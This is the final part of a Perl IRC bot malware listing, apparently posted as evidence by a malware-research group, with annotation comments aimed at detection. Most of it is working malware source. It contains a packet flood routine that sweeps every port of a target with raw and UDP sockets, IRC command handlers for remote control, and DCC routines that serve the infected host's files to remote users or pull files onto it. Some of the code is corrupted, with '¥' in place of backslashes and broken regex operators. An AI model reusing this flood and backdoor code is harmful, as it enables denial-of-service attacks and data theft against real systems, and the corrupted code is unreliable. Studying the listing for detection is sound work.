  571.        }
  572.   }
  573. }
  574.  
  # attacker(host, size, seconds): multi-protocol packet flood routine. It opens sockets for
  # IP protocol numbers 2, 17, 1 and 6 (counted below as igmp, udp, icmp and tcp), then sends
  # a payload of 'B' repeated <size> times to ports 1..65535 until <seconds> have elapsed,
  # also trying the remaining protocol numbers from 3 to 255 for each port.
  # Returns undef when all four socket() calls fail, otherwise the elapsed time followed by
  # the per-protocol counters. Sending is gated by $pacotes.
  # NOTE(review): no call to attacker() appears in this listing.
  575. sub attacker {
  576.   my $iaddr = inet_aton($_[0]);
  577.   my $msg = 'B' x $_[1];
  578.   my $ftime = $_[2];
  579.   my $cp = 0;
  580.   my (%pacotes);
  581.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  582.  
  583.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  584.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  585.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  586.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  587.   return(undef) if $cp == 4;
  588.   my $itime = time;
  589.   my ($cur_time);
  590.   while ( 1 ) {
  591.      for (my $porta = 1; $porta <= 65535; $porta++) {
  592.        $cur_time = time - $itime;
  593.        last if $cur_time >= $ftime;
  594.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
  595.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
  596.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
  597.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
  598.        for (my $pc = 3; $pc <= 255;$pc++) {
  599.          next if $pc == 6;
  600.          $cur_time = time - $itime;
  601.          last if $cur_time >= $ftime;
  602.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  603.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
  604.        }
  605.      }
  606.      last if $cur_time >= $ftime;
  607.   }
  608.   return($cur_time, %pacotes);
  609. }
  610.  
  # IRC command wrappers. Each sub formats one IRC protocol line and passes it to sendraw(),
  # which writes to $IRC_cur_socket. Most of them return without sending unless the argument
  # count matches the check on their first line. ircase() and parse() call these.
  611. sub action {
  612.    return unless $#_ == 1;
  613.    sendraw("PRIVMSG $_[0] :¥001ACTION $_[1]¥001");
  614. }
  # CTCP request: the payload is wrapped in the CTCP delimiter inside a PRIVMSG.
  615. sub ctcp {
  616.    return unless $#_ == 1;
  617.    sendraw("PRIVMSG $_[0] :¥001$_[1]¥001");
  618. }
  619. sub msg {
  620.    return unless $#_ == 1;
  621.    sendraw("PRIVMSG $_[0] :$_[1]");
  622. }
  623. sub notice {
  624.    return unless $#_ == 1;
  625.    sendraw("NOTICE $_[0] :$_[1]");
  626. }
  # Channel mode changes (operator, half-op, voice, ban).
  627. sub op {
  628.    return unless $#_ == 1;
  629.    sendraw("MODE $_[0] +o $_[1]");
  630. }
  631. sub deop {
  632.    return unless $#_ == 1;
  633.    sendraw("MODE $_[0] -o $_[1]");
  634. }
  635. sub hop {
  636.     return unless $#_ == 1;
  637.    sendraw("MODE $_[0] +h $_[1]");
  638. }
  639. sub dehop {
  640.    return unless $#_ == 1;
  641.    sendraw("MODE $_[0] +h $_[1]");
  642. }
  643. sub voice {
  644.    return unless $#_ == 1;
  645.    sendraw("MODE $_[0] +v $_[1]");
  646. }
  647. sub devoice {
  648.    return unless $#_ == 1;
  649.    sendraw("MODE $_[0] -v $_[1]");
  650. }
  651. sub ban {
  652.    return unless $#_ == 1;
  653.    sendraw("MODE $_[0] +b $_[1]");
  654. }
  655. sub unban {
  656.    return unless $#_ == 1;
  657.    sendraw("MODE $_[0] -b $_[1]");
  658. }
  659. sub kick {
  660.    return unless $#_ == 1;
  661.    sendraw("KICK $_[0] $_[1] :$_[2]");
  662. }
  663. sub modo {
  664.    return unless $#_ == 0;
  665.    sendraw("MODE $_[0] $_[1]");
  666. }
  667. sub mode { modo(@_); }
  # Channel membership.
  668. sub j { &join(@_); }
  669. sub join {
  670.    return unless $#_ == 0;
  671.    sendraw("JOIN $_[0]");
  672. }
  673. sub p { part(@_); }
  674. sub part {sendraw("PART $_[0]");}
  675. sub nick {
  676.   return unless $#_ == 0;
  677.   sendraw("NICK $_[0]");
  678. }
  679. sub invite {
  680.    return unless $#_ == 1;
  681.    sendraw("INVITE $_[1] $_[0]");
  682. }
  683. sub topico {
  684.    return unless $#_ == 1;
  685.    sendraw("TOPIC $_[0] $_[1]");
  686. }
  687. sub topic { topico(@_); }
  # Lookups.
  688. sub whois {
  689.   return unless $#_ == 0;
  690.   sendraw("WHOIS $_[0]");
  691. }
  692. sub who {
  693.   return unless $#_ == 0;
  694.   sendraw("WHO $_[0]");
  695. }
  696. sub names {
  697.   return unless $#_ == 0;
  698.   sendraw("NAMES $_[0]");
  699. }
  700. sub away {
  701.   sendraw("AWAY $_[0]");
  702. }
  703. sub back { away(); }
  # quit() sends QUIT and then ends the process.
  704. sub quit {
  705.   sendraw("QUIT :$_[0]");
  706.   exit;
  707. }
  708.  
  # Package DCC: file transfer between the bot and an IRC user. Transfer state is kept in
  # %DCC, keyed by socket, and the sockets are polled through $dcc_sel.
  709. package DCC;
  # connections(): services every readable DCC socket once (1 s poll); called from the main
  # loop on each pass. Behaviour depends on the socket's recorded type:
  #   get     - appends the received bytes to the local file and acknowledges the byte count
  #   send    - listening socket: accepts the peer and sends the first 1024 bytes of the file
  #   sendcon - reads the peer's acknowledged offset and sends the next 1024 bytes from there
  # The status strings are Portuguese ("Cancelado", "Recebido", "Enviando", "Enviado").
  710. sub connections {
  711.    my @ready = $dcc_sel->can_read(1);
  712. #   return unless (@ready);
  713.    foreach my $fh (@ready) {
  714.      my $dcctipo = $DCC{$fh}{tipo};
  715.      my $arquivo = $DCC{$fh}{arquivo};
  716.      my $bytes = $DCC{$fh}{bytes};
  717.      my $cur_byte = $DCC{$fh}{curbyte};
  718.      my $nick = $DCC{$fh}{nick};
  719.      my $msg;
  720.      my $nread = sysread($fh, $msg, 10240);
  # A zero-byte read on a transfer socket means the peer closed it: mark the transfer cancelled.
  721.      if ($nread == 0 and $dcctipo =/^(get|sendcon)$/) {
  722.         $DCC{$fh}{status} = "Cancelado";
  723.         $DCC{$fh}{ftime} = time;
  724.         $dcc_sel->remove($fh);
  725.         $fh->close;
  726.         next;
  727.      }
  728.      if ($dcctipo eq "get") {
  729.         $DCC{$fh}{curbyte} += length($msg);
  730.  
  731.         my $cur_byte = $DCC{$fh}{curbyte};
  732.  
  733.         open(FILE, ">> $arquivo");
  734.         print FILE "$msg" if ($cur_byte <= $bytes);
  735.         close(FILE);
  736.  
  # Acknowledge the running byte count as a 32-bit big-endian integer.
  737.         my $packbyte = pack("N", $cur_byte);
  738.         print $fh "$packbyte";
  739.  
  740.         if ($bytes == $cur_byte) {
  741.            $dcc_sel->remove($fh);
  742.            $fh->close;
  743.            $DCC{$fh}{status} = "Recebido";
  744.            $DCC{$fh}{ftime} = time;
  745.            next;
  746.         }
  747.      } elsif ($dcctipo eq "send") {
  748.           my $send = $fh->accept;
  749.           $send->autoflush(1);
  750.           $dcc_sel->add($send);
  751.           $dcc_sel->remove($fh);
  752.           $DCC{$send}{tipo} = 'sendcon';
  753.           $DCC{$send}{itime} = time;
  754.           $DCC{$send}{nick} = $nick;
  755.           $DCC{$send}{bytes} = $bytes;
  756.           $DCC{$send}{curbyte} = 0;
  757.           $DCC{$send}{arquivo} = $arquivo;
  758.           $DCC{$send}{ip} = $send->peerhost;
  759.           $DCC{$send}{porta} = $send->peerport;
  760.           $DCC{$send}{status} = "Enviando";
  761.           open(FILE, "< $arquivo");
  762.           my $fbytes;
  763.           read(FILE, $fbytes, 1024);
  764.           print $send "$fbytes";
  765.           close FILE;
  766. #          delete($DCC{$fh});
  767.      } elsif ($dcctipo eq 'sendcon') {
  768.           my $bytes_sended = unpack("N", $msg);
  769.           $DCC{$fh}{curbyte} = $bytes_sended;
  770.           if ($bytes_sended == $bytes) {
  771.              $fh->close;
  772.              $dcc_sel->remove($fh);
  773.              $DCC{$fh}{status} = "Enviado";
  774.              $DCC{$fh}{ftime} = time;
  775.              next;
  776.           }
  777.           open(SENDFILE, "< $arquivo");
  778.           seek(SENDFILE, $bytes_sended, 0);
  779.           my $send_bytes;
  780.           read(SENDFILE, $send_bytes, 1024);
  781.           print $fh "$send_bytes";
  782.           close(SENDFILE);
  783.      }
  784.    }
  785. }
  786.  
  # SEND(nick, file): offers a local file to an IRC user over DCC. Returns 0 when the file is
  # unreadable or empty. Otherwise it opens a listening TCP socket on a random port in the
  # range 1024..65534, records the transfer in %DCC and announces it to <nick> with a
  # "DCC SEND" CTCP message carrying the local address as an integer, the port and the size.
  # For detection: this path makes the infected host listen on an unexpected high port and
  # serve a local file to whoever connects; it is reached from the "send" branch of ircase().
  787. sub SEND {
  788.   my ($nick, $arquivo) = @_;
  789.   unless (-r "$arquivo") {
  790.     return(0);
  791.   }
  792.   my $dccark = $arquivo;
  793.   $dccark =s/[.*¥/](¥S+)/$1/;
  794.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  795.   my $longip = unpack("N",inet_aton($meuip));
  796.   my @filestat = stat($arquivo);
  797.   my $size_total=$filestat[7];
  798.   if ($size_total == 0) {
  799.      return(0);
  800.   }
  801.   my ($porta, $sendsock);
  # Keep picking random ports until a listener can be bound.
  802.   do {
  803.     $porta = int rand(64511);
  804.     $porta += 1024;
  805.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  806.   } until $sendsock;
  807.   $DCC{$sendsock}{tipo} = 'send';
  808.   $DCC{$sendsock}{nick} = $nick;
  809.   $DCC{$sendsock}{bytes} = $size_total;
  810.   $DCC{$sendsock}{arquivo} = $arquivo;
  811.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
  812. }
  # GET(file, longip, port, bytes, nick): starts receiving a file over DCC. Returns 0 when the
  # target file already exists or cannot be created, when the port is below 1024, the address
  # cannot be resolved by fixaddr(), the size is below 1, or the connection fails (15 s timeout).
  # On success the outbound socket is added to $dcc_sel and the transfer is recorded in %DCC
  # with type 'get'; connections() then writes the incoming data to the file.
  # NOTE(review): no call to GET() appears in this listing.
  813. sub GET {
  814.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  815.   return(0) if (-e "$arquivo");
  # Create the (empty) target file up front; it is left behind even if a later check fails.
  816.   if (open(FILE, "> $arquivo")) {
  817.      close FILE;
  818.   } else {
  819.     return(0);
  820.   }
  821.   my $dccip=fixaddr($dcclongip);
  822.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  823.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  824.   $dccsock->autoflush(1);
  825.   $dcc_sel->add($dccsock);
  826.   $DCC{$dccsock}{tipo} = 'get';
  827.   $DCC{$dccsock}{itime} = time;
  828.   $DCC{$dccsock}{nick} = $nick;
  829.   $DCC{$dccsock}{bytes} = $bytes;
  830.   $DCC{$dccsock}{curbyte} = 0;
  831.   $DCC{$dccsock}{arquivo} = $arquivo;
  832.   $DCC{$dccsock}{ip} = $dccip;
  833.   $DCC{$dccsock}{porta} = $dccporta;
  834.   $DCC{$dccsock}{status} = "Recebendo";
  835. }
  # Status(socket): reports on one DCC transfer. For any type other than "chat" it returns a
  # list of type, status, nick, file name, total bytes, bytes so far, elapsed seconds,
  # transfer rate (KB per second) and percentage done; otherwise it returns 0.
  # Rate and percentage are trimmed to two decimals by the pattern matches below.
  # NOTE(review): no call to Status() appears in this listing.
  836. sub Status {
  837.   my $socket = shift;
  838.   my $sock_tipo = $DCC{$socket}{tipo};
  839.   unless (lc($sock_tipo) eq "chat") {
  840.     my $nick = $DCC{$socket}{nick};
  841.     my $arquivo = $DCC{$socket}{arquivo};
  842.     my $itime = $DCC{$socket}{itime};
  843.     my $ftime = time;
  844.     my $status = $DCC{$socket}{status};
  # Use the recorded finish time when the transfer has ended, otherwise the current time.
  845.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
  846.  
  847.     my $d_time = $ftime-$itime;
  848.  
  849.     my $cur_byte = $DCC{$socket}{curbyte};
  850.     my $bytes_total =  $DCC{$socket}{bytes};
  851.  
  852.     my $rate = 0;
  853.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
  854.     my $porcen = ($cur_byte*100)/$bytes_total;
  855.  
  856.     my ($r_duv, $p_duv);
  857.     if ($rate =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  858.        $r_duv = $3; $r_duv++ if $4 >= 5;
  859.        $rate = "$1¥.$2"."$r_duv";
  860.     }
  861.     if ($porcen =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  862.        $p_duv = $3; $p_duv++ if $4 >= 5;
  863.        $porcen = "$1¥.$2"."$p_duv";
  864.     }
  865.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  866.   }
  867.   return(0);
  868. }
  869.  
  # fixaddr(address): normalises a peer address to dotted-quad form. An all-digit value is
  # treated as a 32-bit integer address, a dotted quad is returned unchanged, and a value
  # containing letters is resolved with gethostbyname(). Anything else returns nothing.
  # Used by GET() on the address field of a DCC offer.
  870. sub fixaddr {
  871.     my ($address) = @_;
  872.  
  873.     chomp $address;
  874.     if ($address =/^¥d+$/) {
  875.         return inet_ntoa(pack "N", $address);
  876.     } elsif ($address =/^[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}$/) {
  877.         return $address;
  878.     } elsif ($address =tr/a-zA-Z//) {
  879.         return inet_ntoa(((gethostbyname($address))[4])[0]);
  880.     } else {
  881.         return;
  882.     }
  883. }
  884.  
  885. # ---- end of evidence----
  886.  
  887. #----
  888. #MalwareMustDie
  889. #"Thou Shalt not Hack"